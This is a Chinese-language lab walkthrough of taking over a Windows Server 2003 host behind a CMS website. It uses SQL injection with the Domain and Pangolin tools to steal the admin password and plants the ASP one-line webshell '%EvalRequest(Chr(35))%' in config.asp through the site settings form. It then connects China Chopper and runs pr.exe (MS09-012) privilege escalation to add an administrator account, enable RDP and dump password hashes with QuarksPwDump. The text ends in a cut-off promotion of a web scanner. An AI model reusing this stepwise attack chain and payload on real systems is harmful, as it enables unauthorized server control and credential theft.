通过菜刀工具获取目标主机权限

获取webshell后，上传一句话木马，通过中国菜刀连接启动3389服务，添加管理员账户，获取目标主机的权限获取webshell插入一句话木马的方法有很多，不一定是通过sql注入。从中国菜刀连接上靶机后，获取服务器权限的步骤方式都一样Setp0实验环境操作机：WindowsXP[172.16.11.2]目标机：Windowsserver2003[172.16.12.2]实验工具：中国菜刀Pr御剑Pangolin3389本实验要求获取网站的服务器权限。Step1目录扫描工具：御剑路径：C:\Tools\目录扫描\打开御剑，在域名中输入，开始扫描；在目录列表中查找后台，发现存在/admin双击打开后台登录页面不过用户名和密码都不知道，没关系，进行下一步：获取用户名和密码。Step2工具：旁注WEB综合检测程序Ver3.6修正版路径：C:\Tools\注入工具\Domain3.6\Domain3.6.exe打开工具，依次点击[SQL注入]--[批量扫描注入点]--[添加网址]--[批量分析注入点]；出现下面这个对话框说明已经检测完毕；点击OK进行下一步；注入点分析完毕后，会在下方列表中显示可注入的地址，选择其中一个地址，右键选择[检测注入]；点击[检测注入]后，主界面从[批量扫描注入点]转到[SQL注入猜解检测]，点击[开始检测]；检测完毕后，显示可以注入，并列出了数据库类型：Access数据库；下面开始逐步[猜解表名]--[猜解列名]--[猜解内容]；点击[猜解表名]后，在数据库列表中会显示4个表，分别是admin、user、movie和news；选择admin表，点击[猜解列名]，成功猜解出三个列名id、username和password；勾选username和password，点击[猜解内容]，右侧列表中成功显示用户名admin，密码469e80d32c0559f8当然密码是MD5加密的，打开本机浏览器，输入，输入刚刚查询到的密文，点击[解密]；成功找到明文密码：admin888；注入的方法与工具很多，或者也可以这样：在浏览器中打开网站首页，在最新产品中随便选择一个打开[注入点太多]；复制URL[=7]，使用工具：穿山甲工具：[穿山甲Pangolin]路径：C:\Tools\注入工具\pangolinPangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞，从而达到获取、修改、删除数据，甚至控制数据库服务器、Web服务器的目的的测试方法；打开穿山甲，输入URL，点击绿色三角箭头进行注入操作；点击[Dates]切换到Dates选项卡，点击[Tables]成功猜解出4张表；获取内容的原理同Domain的使用方法一样，[猜解表名]--[猜解列名]--[猜解内容]；同样能获取用户名和密码；下一步：登录后台，上传木马；Setp3打开后台登录页面，输入用户名admin，密码admin888，输入验证码，点击[ENTER]登录后台；久违的后台终于进去了….点击左侧菜单栏中的[系统设置管理]--[网站信息配置]，用修改配置文件的方法获取WebShell；打开相应页面后，将[公司名称]内容修改为一句话木马%%EvalRequest(Chr(35))%%'写一句话木马的时候注意闭合；点击最下面的[保存设置]按钮；如果插马成功，[公司名称]内容为空；打开[中国菜刀]连接一句话木马；工具：中国菜刀路径：C:\Tools\webshell\中国菜刀打开菜刀，右键空白处，选择[添加]；在地址栏中输入，为什么是这个路径？因为我们刚才修改的网站信息配置页面，就是这个路径，可以自己下载一个魅力企业网站管理系统源码看看，2007或2009版的都行，里面的目录结构一目了然；连接密码为#，密码为什么是#？往上看一句话木马，里面有个chr(35)，#的ascii码就是35，当然这个密码可以随便设置，只要保证服务端一句话木马里的密码和添加SHELL时输入的密码一致即可，点击[添加]；添加成功后会新增一条记录；双击这个URL，成功进入！解释一下一句话木马/inc/config.asp的源码是这样的：1.%2.ConstSiteName=魅力企业网站管理系统2007中英繁商业正式版'网站名称3.ConstEnSiteName=MSCOM2007'网站名称4.ConstSiteTitle=魅力软件'网站标题5.ConstEnSiteTitle=MelyySoft'网站标题6.ConstSiteUrl=网站地址7.ConstMiibeian=湘ICP备05011184号'网站备案号8.….9.%复制代码构造一句话木马：1.%%EvalRequest(Chr(35))%%'复制代码插入一句话木马后，config.asp代码会变成这样：1.%2.ConstSiteName=%%EvalRequest(Chr(35))%%''网站名称3.ConstEnSiteName=MSCOM2007'网站名称4.ConstSiteTitle=魅力软件'网站标题5.ConstEnSiteTitle=MelyySoft'网站标题6.ConstSiteUrl=网站地址7.ConstMiibeian=湘ICP备05011184号'网站备案号8.….9.%复制代码代码再整理规范一点就是这样：1.%ConstSiteName=%2.%EvalRequest(Chr(35))%3.%''网站名称4.ConstEnSiteName=MSCOM2007'网站名称5.ConstSiteTitle=魅力软件'网站标题6.ConstEnSiteTitle=MelyySoft'网站标题7.ConstSiteUrl=网站地址8.ConstMiibeian=湘ICP备05011184号'网站备案号9.….10.%复制代码所以插入一句话木马一定要保证整个代码的语法是正确的，否则肯定不成功；下一步，添加账户--开启3389--远程桌面连接--获取管理员账户密码；Step4进入C:\RECYCLER目录，准备上传提权工具；当然可写的目录不知这一个，还有其他的；提权工具包括pr，3389，cmd，路径：C:\Tools\提权工具\windows开始上传工具，选中这三个文件，用鼠标直接拖到中国菜刀中，即可完成上传；上传成功；Pr.exe提权Windows跟踪注册表项的ACL权限提升漏洞KB952004MS09-012Windows管理规范（WMI）提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程，同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌，如果攻击者可以以NetworkService或LocalService帐号访问计算机，攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌，就可以获得SYSTEM权限的提升。使用方法：1.pr.exenetuserhacker123/add&netlocalgroupadministratorshacker/add复制代码netuserhacker123/add添加一个用户名为hacker、密码为123的账户；netlocalgroupadministratorshacker/add将账户hacker添加到管理员组；提权有很多种，如巴西烤肉Churrasco.exe等；下一步，执行提权操作；右键cmd.exe，选择[虚拟终端]成功进入，将目录切换到C:\RECYCLER用pr.exe执行cmd命令，添加账户；1.prnetuserhacker123/add复制代码第一次执行命令有可能不成功，怎么办？没关系，再执行一次就OK了；账户添加成功，下一步，将hacker账户添加到系统管理员组；1.prnetlocalgroupadministratorshacker/add复制代码添加成功，下一步，开启3389；1.pr3389复制代码如果出现如上图中的一大堆命令，说明执行成功了，不成功就多执行几次命令，下一步，连接目标机；[开始]--[运行]--mstsc如果找不见目标IP地址，请点击右上角[场景拓扑图]进行查看：输入目标IP地址：172.16.12.2，开始连接，继续输入用户名hacker和密码123，进入系统；3389连接成功！下一步，获取系统管理员密码，准确的说是获取系统管理员密码的hash，上传密码获取工具，还是使用菜刀上传；工具一大堆，随便用，这里我们使用QuarksPwDum，开始上传；上传成功，进入目标机，运行QuarksPwDump注：打开cmd，用命令行启动QuarksPwDump，不要直接双击；运行后，会出现如下界面：继续输入命令：1.QuarksPwDump--dump-hash-local复制代码执行后的结果如下：成功获取到administrator的hash：62C4700EBB05958F3832C92FC614B7D1:4D478675344541AACCF6CF33E1DD9D85暂时切换出实验环境，在你的电脑上打开浏览器输入，在页面的相应位置输入hash，然后GO；ps：如果打不开就翻墙，或者用其他类似功能的网站也可以，这样的站点很多；最终结果输出：___________________________________________________________________________________________________________________________________________WVSWVS[WebVulnerabilityScanner]是一个自动化的Web应用程序安全测试工具。官网：、WVS可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序。2、它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。3、除了自动化地扫描可以利用的漏洞，WVS还提供了分析现有通用产品和客户定制产品（包括那些依赖于JavaScript的程序即AJAX应用程序）的一个强健的解决方案。4、登录保护页面的自动扫描。一个网站最有可能被攻击和容易受到攻击的区域往往是那些需要用户登录的区域。因此对的Acunetix最新版本现在可以自动地和轻松浏览复杂的验证区域，不再需要经常需要手动干预。这包括可以扫描使用单点登录（SSO）和基于OAuth认证的Web应用程序。5、检测WP核心和WP插件的漏洞。可以检测超过1200个WordPress核心和插件的漏洞，目前全球市场上没有其他扫描器可以检测这么多的WordPress漏洞。WordPress网站已经超过了7400万，在WordPress核心发现一个漏洞，或甚至在某一个插件的漏洞都可用于攻击数百万的个人网站。6、支持各种开发架构和Web服务。许多企业级，任务关键的应用程序基本都是使用Java框架或RubyonRails建立的。第10版经过精心设计，可精确抓取扫描和使